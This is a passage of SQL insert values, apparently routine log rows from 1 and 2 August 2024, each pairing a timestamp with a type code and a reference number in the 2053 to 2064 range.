(12026, '2024-08-01 03:11:22', 1, 2061, 0, 1, 1),
(12027, '2024-08-01 03:11:24', 1, 2060, 0, 1, 1),
(12028, '2024-08-01 03:11:27', 1, 2059, 0, 1, 1),
(12029, '2024-08-01 03:11:30', 1, 2058, 0, 1, 1),
(12030, '2024-08-01 03:11:33', 1, 2055, 0, 1, 1),
(12031, '2024-08-01 03:11:36', 1, 2054, 0, 1, 1),
(12032, '2024-08-01 03:11:59', 1, 2064, 0, 1, 1),
(12033, '2024-08-01 03:12:03', 1, 2063, 0, 1, 1),
(12034, '2024-08-01 03:12:06', 1, 2062, 0, 1, 1),
(12035, '2024-08-01 03:12:09', 1, 2061, 0, 1, 1),
(12036, '2024-08-01 03:12:12', 1, 2060, 0, 1, 1),
(12037, '2024-08-01 03:12:15', 1, 2059, 0, 1, 1),
(12038, '2024-08-01 03:12:19', 1, 2058, 0, 1, 1),
(12039, '2024-08-01 03:12:22', 1, 2055, 0, 1, 1),
(12040, '2024-08-01 03:12:25', 1, 2054, 0, 1, 1),
(12041, '2024-08-01 03:12:34', 1, 2064, 0, 1, 1),
(12042, '2024-08-01 03:12:38', 1, 2063, 0, 1, 1),
(12043, '2024-08-01 03:12:40', 1, 2062, 0, 1, 1),
(12044, '2024-08-01 03:12:44', 1, 2061, 0, 1, 1),
(12045, '2024-08-01 03:12:48', 1, 2060, 0, 1, 1),
(12046, '2024-08-01 03:12:50', 1, 2059, 0, 1, 1),
(12047, '2024-08-01 03:12:53', 1, 2058, 0, 1, 1),
(12048, '2024-08-01 03:12:56', 1, 2055, 0, 1, 1),
(12049, '2024-08-01 03:13:00', 1, 2054, 0, 1, 1),
(12050, '2024-08-01 03:13:10', 1, 2064, 0, 1, 1),
(12051, '2024-08-01 03:13:13', 1, 2063, 0, 1, 1),
(12052, '2024-08-01 03:13:15', 1, 2062, 0, 1, 1),
(12053, '2024-08-01 03:13:18', 1, 2061, 0, 1, 1),
(12054, '2024-08-01 03:13:21', 1, 2060, 0, 1, 1),
(12055, '2024-08-01 03:13:24', 1, 2059, 0, 1, 1),
(12056, '2024-08-01 03:13:27', 1, 2058, 0, 1, 1),
(12057, '2024-08-01 03:13:30', 1, 2055, 0, 1, 1),
(12058, '2024-08-01 03:13:33', 1, 2054, 0, 1, 1),
(12059, '2024-08-01 03:13:41', 4, 2054, 0, 1, 1),
(12060, '2024-08-01 05:10:10', 1, 2062, 0, 1, 1),
(12061, '2024-08-01 05:10:17', 1, 2064, 0, 1, 1),
(12062, '2024-08-01 05:10:21', 1, 2061, 0, 1, 1),
(12063, '2024-08-01 05:10:24', 1, 2058, 0, 1, 1),
(12064, '2024-08-01 05:10:28', 1, 2055, 0, 1, 1),
(12065, '2024-08-01 05:10:31', 1, 2059, 0, 1, 1),
(12066, '2024-08-01 05:10:38', 1, 2061, 0, 1, 1),
(12067, '2024-08-01 05:10:41', 1, 2059, 0, 1, 1),
(12068, '2024-08-01 05:10:44', 1, 2058, 0, 1, 1),
(12069, '2024-08-01 05:10:47', 1, 2054, 0, 1, 1),
(12070, '2024-08-01 05:10:50', 1, 2060, 0, 1, 1),
(12071, '2024-08-01 05:10:59', 1, 2061, 0, 1, 1),
(12072, '2024-08-01 05:11:01', 1, 2063, 0, 1, 1),
(12073, '2024-08-01 05:11:07', 1, 2055, 0, 1, 1),
(12074, '2024-08-01 05:11:11', 1, 2054, 0, 1, 1),
(12075, '2024-08-01 05:11:14', 1, 2064, 0, 1, 1),
(12076, '2024-08-01 05:11:19', 1, 2058, 0, 1, 1),
(12077, '2024-08-01 05:11:22', 1, 2059, 0, 1, 1),
(12078, '2024-08-01 05:11:26', 1, 2060, 0, 1, 1),
(12079, '2024-08-01 05:11:30', 1, 2061, 0, 1, 1),
(12080, '2024-08-01 05:11:33', 1, 2062, 0, 1, 1),
(12081, '2024-08-01 05:11:38', 1, 2063, 0, 1, 1),
(12082, '2024-08-01 05:11:46', 1, 2064, 0, 1, 1),
(12083, '2024-08-01 05:11:50', 1, 2063, 0, 1, 1),
(12084, '2024-08-01 05:11:53', 1, 2062, 0, 1, 1),
(12085, '2024-08-01 05:11:56', 1, 2061, 0, 1, 1),
(12086, '2024-08-01 05:12:01', 1, 2060, 0, 1, 1),
(12087, '2024-08-01 05:12:07', 1, 2059, 0, 1, 1),
(12088, '2024-08-01 05:12:10', 1, 2058, 0, 1, 1),
(12089, '2024-08-01 05:12:13', 1, 2055, 0, 1, 1),
(12090, '2024-08-01 05:12:17', 1, 2054, 0, 1, 1),
(12091, '2024-08-01 05:12:20', 1, 2053, 0, 1, 1),
(12092, '2024-08-01 05:12:24', 1, 2058, 0, 1, 1),
(12093, '2024-08-01 05:12:31', 1, 2064, 0, 1, 1),
(12094, '2024-08-01 05:12:35', 1, 2058, 0, 1, 1),
(12095, '2024-08-01 05:12:40', 1, 2059, 0, 1, 1),
(12096, '2024-08-01 05:12:43', 1, 2060, 0, 1, 1),
(12097, '2024-08-01 05:12:47', 1, 2061, 0, 1, 1),
(12098, '2024-08-01 05:12:51', 1, 2062, 0, 1, 1),
(12099, '2024-08-01 05:12:56', 1, 2063, 0, 1, 1),
(12100, '2024-08-01 05:13:09', 1, 2064, 0, 1, 1),
(12101, '2024-08-01 05:13:13', 1, 2058, 0, 1, 1),
(12102, '2024-08-01 05:13:17', 1, 2059, 0, 1, 1),
(12103, '2024-08-01 05:13:20', 1, 2060, 0, 1, 1),
(12104, '2024-08-01 05:13:23', 1, 2061, 0, 1, 1),
(12105, '2024-08-01 05:13:27', 1, 2062, 0, 1, 1),
(12106, '2024-08-01 05:13:32', 1, 2063, 0, 1, 1),
(12107, '2024-08-01 05:13:43', 1, 2064, 0, 1, 1),
(12108, '2024-08-01 05:13:47', 1, 2063, 0, 1, 1),
(12109, '2024-08-01 05:13:51', 1, 2062, 0, 1, 1),
(12110, '2024-08-01 05:13:55', 1, 2061, 0, 1, 1),
(12111, '2024-08-01 05:13:58', 1, 2060, 0, 1, 1),
(12112, '2024-08-01 05:14:03', 1, 2059, 0, 1, 1),
(12113, '2024-08-01 05:14:07', 1, 2058, 0, 1, 1),
(12114, '2024-08-01 05:14:11', 1, 2055, 0, 1, 1),
(12115, '2024-08-01 05:14:16', 1, 2054, 0, 1, 1),
(12116, '2024-08-01 05:14:39', 1, 2064, 0, 1, 1),
(12117, '2024-08-01 05:14:45', 1, 2063, 0, 1, 1),
(12118, '2024-08-01 05:14:48', 1, 2062, 0, 1, 1),
(12119, '2024-08-01 05:14:51', 1, 2061, 0, 1, 1),
(12120, '2024-08-01 05:14:55', 1, 2060, 0, 1, 1),
(12121, '2024-08-01 05:14:59', 1, 2059, 0, 1, 1),
(12122, '2024-08-01 05:15:01', 1, 2058, 0, 1, 1),
(12123, '2024-08-01 05:15:05', 1, 2055, 0, 1, 1),
(12124, '2024-08-01 05:15:09', 1, 2054, 0, 1, 1),
(12125, '2024-08-01 05:15:17', 1, 2064, 0, 1, 1),
(12126, '2024-08-01 05:15:22', 1, 2063, 0, 1, 1),
(12127, '2024-08-01 05:15:26', 1, 2062, 0, 1, 1),
(12128, '2024-08-01 05:15:30', 1, 2061, 0, 1, 1),
(12129, '2024-08-01 05:15:33', 1, 2060, 0, 1, 1),
(12130, '2024-08-01 05:15:37', 1, 2059, 0, 1, 1),
(12131, '2024-08-01 05:15:41', 1, 2058, 0, 1, 1),
(12132, '2024-08-01 05:15:45', 1, 2055, 0, 1, 1),
(12133, '2024-08-01 05:15:49', 1, 2054, 0, 1, 1),
(12134, '2024-08-01 05:15:55', 1, 2064, 0, 1, 1),
(12135, '2024-08-01 05:16:00', 1, 2063, 0, 1, 1),
(12136, '2024-08-01 05:16:04', 1, 2062, 0, 1, 1),
(12137, '2024-08-01 05:16:06', 1, 2061, 0, 1, 1),
(12138, '2024-08-01 05:16:11', 1, 2060, 0, 1, 1),
(12139, '2024-08-01 05:16:14', 1, 2059, 0, 1, 1),
(12140, '2024-08-01 05:16:17', 1, 2058, 0, 1, 1),
(12141, '2024-08-01 05:16:22', 1, 2055, 0, 1, 1),
(12142, '2024-08-01 05:16:26', 1, 2054, 0, 1, 1),
(12143, '2024-08-01 05:16:37', 1, 2064, 0, 1, 1),
(12144, '2024-08-01 05:16:41', 1, 2063, 0, 1, 1),
(12145, '2024-08-01 05:16:46', 1, 2062, 0, 1, 1),
(12146, '2024-08-01 05:16:49', 1, 2061, 0, 1, 1),
(12147, '2024-08-01 05:16:53', 1, 2060, 0, 1, 1),
(12148, '2024-08-01 05:16:57', 1, 2059, 0, 1, 1),
(12149, '2024-08-01 05:17:02', 1, 2058, 0, 1, 1),
(12150, '2024-08-01 05:17:06', 1, 2055, 0, 1, 1),
(12151, '2024-08-01 05:17:10', 1, 2054, 0, 1, 1),
(12152, '2024-08-01 05:17:17', 4, 2054, 0, 1, 1),
(12153, '2024-08-01 14:17:40', 1, 2054, 0, 1, 1),
(12154, '2024-08-01 18:12:54', 1, 2064, 0, 1, 1),
(12155, '2024-08-01 19:50:37', 1, 2059, 0, 1, 1),
(12156, '2024-08-02 01:58:40', 1, 2062, 0, 1, 1),
(12157, '2024-08-02 01:58:46', 1, 2059, 0, 1, 1),
(12158, '2024-08-02 01:58:49', 1, 2064, 0, 1, 1),
(12159, '2024-08-02 01:58:57', 1, 2054, 0, 1, 1),
(12160, '2024-08-02 01:59:01', 1, 2061, 0, 1, 1),
(12161, '2024-08-02 01:59:10', 1, 2064, 0, 1, 1),
(12162, '2024-08-02 01:59:15', 1, 2063, 0, 1, 1),
(12163, '2024-08-02 01:59:25', 1, 2062, 0, 1, 1),
(12164, '2024-08-02 01:59:30', 1, 2061, 0, 1, 1),
(12165, '2024-08-02 01:59:34', 1, 2060, 0, 1, 1),
(12166, '2024-08-02 01:59:39', 1, 2059, 0, 1, 1),
(12167, '2024-08-02 01:59:42', 1, 2058, 0, 1, 1),
(12168, '2024-08-02 01:59:48', 1, 2055, 0, 1, 1),
(12169, '2024-08-02 01:59:52', 1, 2054, 0, 1, 1),
(12170, '2024-08-02 02:00:01', 1, 2053, 0, 1, 1),
(12171, '2024-08-02 02:00:06', 1, 2060, 0, 1, 1),
(12172, '2024-08-02 02:01:14', 1, 2055, 0, 1, 1),
(12173, '2024-08-02 02:01:20', 1, 2058, 0, 1, 1),
(12174, '2024-08-02 02:01:28', 1, 2063, 0, 1, 1),
(12175, '2024-08-02 02:01:42', 1, 2064, 0, 1, 1),
(12176, '2024-08-02 02:01:46', 1, 2063, 0, 1, 1),
(12177, '2024-08-02 02:01:50', 1, 2062, 0, 1, 1),
(12178, '2024-08-02 02:01:54', 1, 2061, 0, 1, 1),
(12179, '2024-08-02 02:01:57', 1, 2060, 0, 1, 1),
(12180, '2024-08-02 02:02:01', 1, 2059, 0, 1, 1),
(12181, '2024-08-02 02:02:03', 1, 2058, 0, 1, 1),
(12182, '2024-08-02 02:02:06', 1, 2055, 0, 1, 1),
(12183, '2024-08-02 02:02:10', 1, 2054, 0, 1, 1),
(12184, '2024-08-02 02:02:20', 1, 2064, 0, 1, 1),
(12185, '2024-08-02 02:02:27', 1, 2063, 0, 1, 1),
(12186, '2024-08-02 02:02:32', 1, 2062, 0, 1, 1),
(12187, '2024-08-02 02:02:35', 1, 2061, 0, 1, 1),
(12188, '2024-08-02 02:02:39', 1, 2060, 0, 1, 1),
(12189, '2024-08-02 02:02:42', 1, 2059, 0, 1, 1),
(12190, '2024-08-02 02:02:45', 1, 2058, 0, 1, 1),
(12191, '2024-08-02 02:02:50', 1, 2055, 0, 1, 1),
(12192, '2024-08-02 02:02:54', 1, 2054, 0, 1, 1),
(12193, '2024-08-02 02:03:14', 1, 2064, 0, 1, 1),
(12194, '2024-08-02 02:03:17', 1, 2063, 0, 1, 1),
(12195, '2024-08-02 02:03:20', 1, 2062, 0, 1, 1),
(12196, '2024-08-02 02:03:24', 1, 2061, 0, 1, 1),
(12197, '2024-08-02 02:03:31', 1, 2060, 0, 1, 1),
(12198, '2024-08-02 02:03:39', 1, 2059, 0, 1, 1),
(12199, '2024-08-02 02:03:43', 1, 2058, 0, 1, 1),
(12200, '2024-08-02 02:03:47', 1, 2055, 0, 1, 1),
(12201, '2024-08-02 02:03:52', 1, 2054, 0, 1, 1),
(12202, '2024-08-02 02:04:04', 1, 2064, 0, 1, 1),
(12203, '2024-08-02 02:04:09', 1, 2063, 0, 1, 1),
(12204, '2024-08-02 02:04:12', 1, 2062, 0, 1, 1),
(12205, '2024-08-02 02:04:16', 1, 2061, 0, 1, 1),
(12206, '2024-08-02 02:04:20', 1, 2060, 0, 1, 1),
(12207, '2024-08-02 02:04:24', 1, 2059, 0, 1, 1),
(12208, '2024-08-02 02:04:28', 1, 2058, 0, 1, 1),
(12209, '2024-08-02 02:04:31', 1, 2055, 0, 1, 1),
(12210, '2024-08-02 02:04:34', 1, 2054, 0, 1, 1),
(12211, '2024-08-02 02:04:42', 1, 2064, 0, 1, 1),
(12212, '2024-08-02 02:04:50', 1, 2058, 0, 1, 1),
(12213, '2024-08-02 02:04:54', 1, 2059, 0, 1, 1),
(12214, '2024-08-02 02:04:59', 1, 2060, 0, 1, 1),
(12215, '2024-08-02 02:05:07', 1, 2061, 0, 1, 1),
(12216, '2024-08-02 02:05:12', 1, 2062, 0, 1, 1),
(12217, '2024-08-02 02:05:20', 1, 2063, 0, 1, 1),
(12218, '2024-08-02 02:05:40', 1, 2064, 0, 1, 1),
(12219, '2024-08-02 02:05:45', 1, 2063, 0, 1, 1),
(12220, '2024-08-02 02:05:51', 1, 2062, 0, 1, 1),
(12221, '2024-08-02 02:05:55', 1, 2061, 0, 1, 1),
(12222, '2024-08-02 02:06:00', 1, 2060, 0, 1, 1),
(12223, '2024-08-02 02:06:03', 1, 2059, 0, 1, 1),
(12224, '2024-08-02 02:06:06', 1, 2058, 0, 1, 1),
(12225, '2024-08-02 02:06:13', 1, 2055, 0, 1, 1),
(12226, '2024-08-02 02:06:16', 1, 2054, 0, 1, 1),
(12227, '2024-08-02 02:06:19', 1, 2064, 0, 1, 1),
(12228, '2024-08-02 02:06:39', 1, 2058, 0, 1, 1),
(12229, '2024-08-02 02:06:45', 1, 2059, 0, 1, 1),
(12230, '2024-08-02 02:06:50', 1, 2060, 0, 1, 1),
(12231, '2024-08-02 02:06:53', 1, 2061, 0, 1, 1),
(12232, '2024-08-02 02:06:56', 1, 2062, 0, 1, 1),
(12233, '2024-08-02 02:07:01', 1, 2063, 0, 1, 1),
(12234, '2024-08-02 02:07:19', 4, 2054, 0, 1, 1),
(12235, '2024-08-02 04:12:02', 1, 2061, 0, 1, 1),
(12236, '2024-08-02 04:12:05', 1, 2059, 0, 1, 1),
(12237, '2024-08-02 04:12:08', 1, 2058, 0, 1, 1),
(12238, '2024-08-02 04:12:11', 1, 2054, 0, 1, 1),
(12239, '2024-08-02 04:12:15', 1, 2055, 0, 1, 1),
(12240, '2024-08-02 04:12:18', 1, 2061, 0, 1, 1),
(12241, '2024-08-02 04:12:20', 1, 2064, 0, 1, 1),
(12242, '2024-08-02 04:12:26', 1, 2064, 0, 1, 1),
(12243, '2024-08-02 04:12:29', 1, 2063, 0, 1, 1),
(12244, '2024-08-02 04:12:31', 1, 2062, 0, 1, 1),
(12245, '2024-08-02 04:12:34', 1, 2061, 0, 1, 1),
(12246, '2024-08-02 04:12:37', 1, 2060, 0, 1, 1),
(12247, '2024-08-02 04:12:40', 1, 2059, 0, 1, 1),
(12248, '2024-08-02 04:12:43', 1, 2058, 0, 1, 1),
(12249, '2024-08-02 04:12:46', 1, 2055, 0, 1, 1),
(12250, '2024-08-02 04:12:48', 1, 2054, 0, 1, 1),
(12251, '2024-08-02 04:12:51', 1, 2053, 0, 1, 1),
(12252, '2024-08-02 04:12:53', 1, 2063, 0, 1, 1),
(12253, '2024-08-02 04:12:58', 1, 2064, 0, 1, 1),
(12254, '2024-08-02 04:13:01', 1, 2063, 0, 1, 1),
(12255, '2024-08-02 04:13:03', 1, 2062, 0, 1, 1),
(12256, '2024-08-02 04:13:05', 1, 2061, 0, 1, 1),
(12257, '2024-08-02 04:13:08', 1, 2060, 0, 1, 1),
(12258, '2024-08-02 04:13:10', 1, 2060, 0, 1, 1),
(12259, '2024-08-02 04:13:14', 1, 2054, 0, 1, 1),
(12260, '2024-08-02 04:13:17', 1, 2059, 0, 1, 1),
(12261, '2024-08-02 04:13:20', 1, 2058, 0, 1, 1),
(12262, '2024-08-02 04:13:26', 1, 2062, 0, 1, 1),
(12263, '2024-08-02 04:13:38', 1, 2064, 0, 1, 1),
(12264, '2024-08-02 04:13:42', 1, 2063, 0, 1, 1),
(12265, '2024-08-02 04:13:45', 1, 2062, 0, 1, 1),
(12266, '2024-08-02 04:13:48', 1, 2061, 0, 1, 1),
(12267, '2024-08-02 04:13:52', 1, 2060, 0, 1, 1),
(12268, '2024-08-02 04:13:55', 1, 2059, 0, 1, 1),
(12269, '2024-08-02 04:14:00', 1, 2058, 0, 1, 1),
(12270, '2024-08-02 04:14:06', 1, 2055, 0, 1, 1),
(12271, '2024-08-02 04:14:13', 1, 2054, 0, 1, 1),
(12272, '2024-08-02 04:14:31', 1, 2064, 0, 1, 1),
(12273, '2024-08-02 04:14:40', 1, 2058, 0, 1, 1),
(12274, '2024-08-02 04:14:46', 1, 2059, 0, 1, 1),
(12275, '2024-08-02 04:14:53', 1, 2060, 0, 1, 1),
(12276, '2024-08-02 04:14:59', 1, 2061, 0, 1, 1),
(12277, '2024-08-02 04:15:01', 1, 2062, 0, 1, 1),
(12278, '2024-08-02 04:15:04', 1, 2063, 0, 1, 1),
(12279, '2024-08-02 04:15:15', 1, 2064, 0, 1, 1),
(12280, '2024-08-02 04:15:19', 1, 2063, 0, 1, 1),
(12281, '2024-08-02 04:15:22', 1, 2062, 0, 1, 1),
(12282, '2024-08-02 04:15:25', 1, 2061, 0, 1, 1),
(12283, '2024-08-02 04:15:28', 1, 2060, 0, 1, 1),
(12284, '2024-08-02 04:15:33', 1, 2059, 0, 1, 1),
(12285, '2024-08-02 04:15:36', 1, 2058, 0, 1, 1),
(12286, '2024-08-02 04:15:41', 1, 2055, 0, 1, 1),
(12287, '2024-08-02 04:15:43', 1, 2054, 0, 1, 1),
(12288, '2024-08-02 04:16:01', 1, 2064, 0, 1, 1),
(12289, '2024-08-02 04:16:07', 1, 2063, 0, 1, 1),
(12290, '2024-08-02 04:16:10', 1, 2062, 0, 1, 1),
(12291, '2024-08-02 04:16:14', 1, 2061, 0, 1, 1),
(12292, '2024-08-02 04:16:17', 1, 2060, 0, 1, 1),
(12293, '2024-08-02 04:16:20', 1, 2059, 0, 1, 1),
(12294, '2024-08-02 04:16:23', 1, 2058, 0, 1, 1),
(12295, '2024-08-02 04:16:26', 1, 2055, 0, 1, 1),
(12296, '2024-08-02 04:16:29', 1, 2054, 0, 1, 1),
(12297, '2024-08-02 04:16:44', 1, 2064, 0, 1, 1),
(12298, '2024-08-02 04:16:48', 1, 2058, 0, 1, 1),
(12299, '2024-08-02 04:16:51', 1, 2059, 0, 1, 1),
(12300, '2024-08-02 04:16:56', 1, 2060, 0, 1, 1),
(12301, '2024-08-02 04:17:00', 1, 2061, 0, 1, 1),
(12302, '2024-08-02 04:17:02', 1, 2062, 0, 1, 1),
(12303, '2024-08-02 04:17:06', 1, 2063, 0, 1, 1),
(12304, '2024-08-02 04:17:24', 1, 2064, 0, 1, 1),
(12305, '2024-08-02 04:17:29', 1, 2063, 0, 1, 1),
(12306, '2024-08-02 04:17:34', 1, 2062, 0, 1, 1),
(12307, '2024-08-02 04:17:39', 1, 2061, 0, 1, 1),
(12308, '2024-08-02 04:17:42', 1, 2060, 0, 1, 1),
(12309, '2024-08-02 04:17:45', 1, 2059, 0, 1, 1),
(12310, '2024-08-02 04:17:49', 1, 2058, 0, 1, 1),
(12311, '2024-08-02 04:17:57', 1, 2055, 0, 1, 1),
(12312, '2024-08-02 04:17:59', 1, 2054, 0, 1, 1),
(12313, '2024-08-02 04:18:15', 1, 2064, 0, 1, 1),
(12314, '2024-08-02 04:18:19', 1, 2063, 0, 1, 1),
(12315, '2024-08-02 04:18:22', 1, 2062, 0, 1, 1),
(12316, '2024-08-02 04:18:25', 1, 2061, 0, 1, 1),
(12317, '2024-08-02 04:18:28', 1, 2060, 0, 1, 1),
(12318, '2024-08-02 04:18:31', 1, 2059, 0, 1, 1),
(12319, '2024-08-02 04:18:35', 1, 2058, 0, 1, 1),
(12320, '2024-08-02 04:18:40', 1, 2055, 0, 1, 1),
(12321, '2024-08-02 04:18:50', 1, 2054, 0, 1, 1),
(12322, '2024-08-02 04:20:12', 4, 2054, 0, 1, 1),
(12323, '2024-08-02 05:41:32', 1, 2063, 0, 1, 1),
(12324, '2024-08-02 06:40:59', 1, 2059, 0, 1, 1),
(12325, '2024-08-02 06:52:44', 1, 2059, 0, 1, 1),
(12326, '2024-08-02 07:44:16', 1, 2064, 0, 1, 1),
(12327, '2024-08-02 09:36:38', 1, 2058, 0, 1, 1),
(12328, '2024-08-02 12:08:55', 1, 2062, 0, 1, 1),
(12329, '2024-08-02 12:09:02', 1, 2061, 0, 1, 1),
(12330, '2024-08-02 12:09:04', 1, 2055, 0, 1, 1),
(12331, '2024-08-02 12:09:10', 1, 2061, 0, 1, 1),
(12332, '2024-08-02 12:09:12', 1, 2059, 0, 1, 1),
(12333, '2024-08-02 12:09:16', 1, 2058, 0, 1, 1),
(12334, '2024-08-02 12:09:19', 1, 2054, 0, 1, 1),
(12335, '2024-08-02 12:09:23', 1, 2054, 0, 1, 1),
(12336, '2024-08-02 12:09:26', 1, 2059, 0, 1, 1),
(12337, '2024-08-02 12:09:34', 1, 2064, 0, 1, 1),
(12338, '2024-08-02 12:09:38', 1, 2061, 0, 1, 1),
(12339, '2024-08-02 12:09:41', 1, 2058, 0, 1, 1),
(12340, '2024-08-02 12:09:44', 1, 2055, 0, 1, 1),
(12341, '2024-08-02 12:09:47', 1, 2064, 0, 1, 1),
(12342, '2024-08-02 12:09:52', 1, 2058, 0, 1, 1),
(12343, '2024-08-02 12:09:56', 1, 2059, 0, 1, 1),
(12344, '2024-08-02 12:09:58', 1, 2060, 0, 1, 1),
(12345, '2024-08-02 12:10:02', 1, 2061, 0, 1, 1),
(12346, '2024-08-02 12:10:04', 1, 2062, 0, 1, 1),
(12347, '2024-08-02 12:10:07', 1, 2063, 0, 1, 1),
(12348, '2024-08-02 12:10:10', 1, 2058, 0, 1, 1),
(12349, '2024-08-02 12:10:17', 1, 2064, 0, 1, 1),
(12350, '2024-08-02 12:10:21', 1, 2063, 0, 1, 1),
(12351, '2024-08-02 12:10:24', 1, 2062, 0, 1, 1),
(12352, '2024-08-02 12:10:28', 1, 2061, 0, 1, 1),
(12353, '2024-08-02 12:10:30', 1, 2060, 0, 1, 1),
(12354, '2024-08-02 12:10:35', 1, 2059, 0, 1, 1),
(12355, '2024-08-02 12:10:38', 1, 2058, 0, 1, 1),
(12356, '2024-08-02 12:10:41', 1, 2055, 0, 1, 1),
(12357, '2024-08-02 12:10:44', 1, 2054, 0, 1, 1),
(12358, '2024-08-02 12:10:48', 1, 2053, 0, 1, 1),
(12359, '2024-08-02 12:10:51', 1, 2063, 0, 1, 1),
(12360, '2024-08-02 12:10:54', 1, 2060, 0, 1, 1),
(12361, '2024-08-02 12:11:03', 1, 2064, 0, 1, 1),
(12362, '2024-08-02 12:11:08', 1, 2063, 0, 1, 1),
(12363, '2024-08-02 12:11:12', 1, 2062, 0, 1, 1),
(12364, '2024-08-02 12:11:15', 1, 2061, 0, 1, 1),
(12365, '2024-08-02 12:11:18', 1, 2060, 0, 1, 1),
(12366, '2024-08-02 12:11:22', 1, 2059, 0, 1, 1),
(12367, '2024-08-02 12:11:26', 1, 2058, 0, 1, 1),
(12368, '2024-08-02 12:11:30', 1, 2055, 0, 1, 1),
(12369, '2024-08-02 12:11:34', 1, 2054, 0, 1, 1),
(12370, '2024-08-02 12:11:41', 1, 2064, 0, 1, 1),
(12371, '2024-08-02 12:11:45', 1, 2063, 0, 1, 1),
(12372, '2024-08-02 12:11:48', 1, 2062, 0, 1, 1),
(12373, '2024-08-02 12:11:51', 1, 2061, 0, 1, 1),
(12374, '2024-08-02 12:11:54', 1, 2060, 0, 1, 1),
(12375, '2024-08-02 12:11:56', 1, 2059, 0, 1, 1),
(12376, '2024-08-02 12:12:00', 1, 2058, 0, 1, 1),
(12377, '2024-08-02 12:12:03', 1, 2055, 0, 1, 1),
(12378, '2024-08-02 12:12:07', 1, 2054, 0, 1, 1),
(12379, '2024-08-02 12:12:16', 1, 2064, 0, 1, 1),
(12380, '2024-08-02 12:12:22', 1, 2063, 0, 1, 1),
(12381, '2024-08-02 12:12:26', 1, 2062, 0, 1, 1),
(12382, '2024-08-02 12:12:28', 1, 2061, 0, 1, 1),
(12383, '2024-08-02 12:12:32', 1, 2060, 0, 1, 1),
(12384, '2024-08-02 12:12:36', 1, 2059, 0, 1, 1),
(12385, '2024-08-02 12:12:40', 1, 2058, 0, 1, 1),
(12386, '2024-08-02 12:12:43', 1, 2055, 0, 1, 1),
(12387, '2024-08-02 12:12:46', 1, 2054, 0, 1, 1),
(12388, '2024-08-02 12:12:50', 1, 2064, 0, 1, 1),
(12389, '2024-08-02 12:12:54', 1, 2058, 0, 1, 1),
(12390, '2024-08-02 12:12:57', 1, 2059, 0, 1, 1),
(12391, '2024-08-02 12:13:00', 1, 2060, 0, 1, 1),
(12392, '2024-08-02 12:13:04', 1, 2061, 0, 1, 1),
(12393, '2024-08-02 12:13:08', 1, 2062, 0, 1, 1),
(12394, '2024-08-02 12:13:11', 1, 2063, 0, 1, 1),
(12395, '2024-08-02 12:13:30', 1, 2064, 0, 1, 1),
(12396, '2024-08-02 12:13:35', 1, 2063, 0, 1, 1),
(12397, '2024-08-02 12:13:39', 1, 2062, 0, 1, 1),
(12398, '2024-08-02 12:13:42', 1, 2061, 0, 1, 1),
(12399, '2024-08-02 12:13:46', 1, 2060, 0, 1, 1),
(12400, '2024-08-02 12:13:50', 1, 2059, 0, 1, 1),
(12401, '2024-08-02 12:13:54', 1, 2058, 0, 1, 1),
(12402, '2024-08-02 12:13:57', 1, 2055, 0, 1, 1),
(12403, '2024-08-02 12:14:01', 1, 2054, 0, 1, 1),
(12404, '2024-08-02 12:14:08', 1, 2064, 0, 1, 1),
(12405, '2024-08-02 12:14:12', 1, 2063, 0, 1, 1),
(12406, '2024-08-02 12:14:16', 1, 2062, 0, 1, 1),
(12407, '2024-08-02 12:14:19', 1, 2061, 0, 1, 1),
(12408, '2024-08-02 12:14:21', 1, 2060, 0, 1, 1),
(12409, '2024-08-02 12:14:25', 1, 2059, 0, 1, 1),
(12410, '2024-08-02 12:14:29', 1, 2058, 0, 1, 1),
(12411, '2024-08-02 12:14:32', 1, 2055, 0, 1, 1),
(12412, '2024-08-02 12:14:35', 1, 2054, 0, 1, 1),
(12413, '2024-08-02 12:14:46', 1, 2064, 0, 1, 1),
(12414, '2024-08-02 12:14:50', 1, 2058, 0, 1, 1),
(12415, '2024-08-02 12:14:53', 1, 2059, 0, 1, 1),
(12416, '2024-08-02 12:14:56', 1, 2060, 0, 1, 1),
(12417, '2024-08-02 12:14:58', 1, 2061, 0, 1, 1),
(12418, '2024-08-02 12:15:01', 1, 2062, 0, 1, 1),
(12419, '2024-08-02 12:15:03', 1, 2063, 0, 1, 1),
(12420, '2024-08-02 12:15:17', 4, 2054, 0, 1, 1),
(12421, '2024-08-02 14:44:37', 1, 2059, 0, 1, 1),
(12422, '2024-08-02 14:47:40', 1, 2055, 0, 1, 1),
(12423, '2024-08-02 14:47:42', 1, 2059, 0, 1, 1),
(12424, '2024-08-02 14:47:47', 1, 2061, 0, 1, 1),
(12425, '2024-08-02 14:47:50', 1, 2062, 0, 1, 1),
(12426, '2024-08-02 14:47:55', 1, 2060, 0, 1, 1),
(12427, '2024-08-02 14:48:01', 1, 2064, 0, 1, 1),
(12428, '2024-08-02 14:48:04', 1, 2063, 0, 1, 1),
(12429, '2024-08-02 14:48:06', 1, 2062, 0, 1, 1),
(12430, '2024-08-02 14:48:09', 1, 2061, 0, 1, 1),
(12431, '2024-08-02 14:48:11', 1, 2060, 0, 1, 1),
(12432, '2024-08-02 14:48:14', 1, 2054, 0, 1, 1),
(12433, '2024-08-02 14:48:16', 1, 2058, 0, 1, 1),
(12434, '2024-08-02 14:48:20', 1, 2064, 0, 1, 1),
(12435, '2024-08-02 14:48:23', 1, 2058, 0, 1, 1),
(12436, '2024-08-02 14:48:26', 1, 2059, 0, 1, 1),
(12437, '2024-08-02 14:48:28', 1, 2060, 0, 1, 1),
(12438, '2024-08-02 14:48:31', 1, 2061, 0, 1, 1),
(12439, '2024-08-02 14:48:35', 1, 2062, 0, 1, 1),
(12440, '2024-08-02 14:48:38', 1, 2063, 0, 1, 1),
(12441, '2024-08-02 14:48:40', 1, 2063, 0, 1, 1),
(12442, '2024-08-02 14:48:47', 1, 2064, 0, 1, 1),
(12443, '2024-08-02 14:48:50', 1, 2063, 0, 1, 1),
(12444, '2024-08-02 14:48:53', 1, 2062, 0, 1, 1),
(12445, '2024-08-02 14:48:56', 1, 2061, 0, 1, 1),
(12446, '2024-08-02 14:48:59', 1, 2060, 0, 1, 1),
(12447, '2024-08-02 14:49:01', 1, 2059, 0, 1, 1),
(12448, '2024-08-02 14:49:04', 1, 2058, 0, 1, 1),
(12449, '2024-08-02 14:49:06', 1, 2055, 0, 1, 1),
(12450, '2024-08-02 14:49:08', 1, 2054, 0, 1, 1),
(12451, '2024-08-02 14:49:11', 1, 2053, 0, 1, 1),
(12452, '2024-08-02 14:49:19', 1, 2064, 0, 1, 1),
(12453, '2024-08-02 14:49:23', 1, 2063, 0, 1, 1),
